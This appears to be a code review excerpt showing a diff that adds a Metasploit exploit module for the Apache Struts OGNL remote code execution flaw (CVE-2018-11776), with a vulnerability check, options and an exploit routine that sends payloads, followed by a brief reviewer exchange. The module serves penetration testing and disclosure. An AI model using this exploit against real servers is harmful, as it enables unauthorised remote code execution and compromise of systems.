modules/exploits/multi/http/struts2_namespace_ognl.rb

```diff
@@ -0,0 +1,337 @@
+      'Description'    => %q{
+        This module exploits a remote code execution vulnerability in Apache Struts
+        version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed
+        via an endpoint that makes use of a redirect action.
+
+        Native payloads will be converted to executables and dropped in the
+        server's temp dir. If this fails, try a cmd/* payload, which won't
+        have to write to the disk.
+      },
+      #TODO: Is that second paragraph above still accurate?
+      'Author'         => [
+        'Man Yue Mo', # Discovery
+        'hook-s3c',   # PoC
+        'asoto-r7',   # Metasploit module
+        'wvu'         # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-11776'],
+        ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],
+        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057']
+      ],
+      'Privileged'     => true,
+      'Targets'        => [
+        [
+          'Universal', {
+            'Platform'   => %w{ unix windows linux },
+            'Arch'       => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+          },
+        ],
+      ],
+      'DisclosureDate' => 'Apr 10 2018',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),
+          OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),
+          OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', "X-#{rand_text_alpha(4)}"] )
+        ]
+      )
+      register_advanced_options(
+        [
+          OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])
+        ]
+      )
+  end
+
+  def check
+    # Generate two random numbers, ask the target to add them together.
+    #   If it does, it's vulnerable.
+    a = rand(10000)
+    b = rand(10000)
+    c = a+b
+
+    ognl = "#{a}+#{b}"
+
+    begin
+      resp = send_struts_request(ognl)
+    rescue Msf::Exploit::Failed => error
+      print_error(error.to_s)
+      return Exploit::CheckCode::Unknown
+    end
+
+    # If vulnerable, the server should return an HTTP 302 (Redirect)
+    #   and the 'Location' header should contain the sum of our two numbers (a+b)
+    if resp && resp.code == 302 && (resp.headers['Location'].include?c.to_s)
+      vprint_status("Redirected to:  #{resp.headers['Location']}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    case payload.arch.first
+    when ARCH_CMD
+      resp = execute_command(payload.encoded)
+    else
+      # fail_with(Failure::BadConfig,"Only cmd payloads are currently supported.")
+      resp = send_payload()
+    end
+  end
+
+  def encode_ognl(ognl, string_delimiter:"'")
```

Comment:
Excellent use of keyword args.

Reply:
Yeah.  It seemed like a good idea at the time, but ended up not being useful.  😃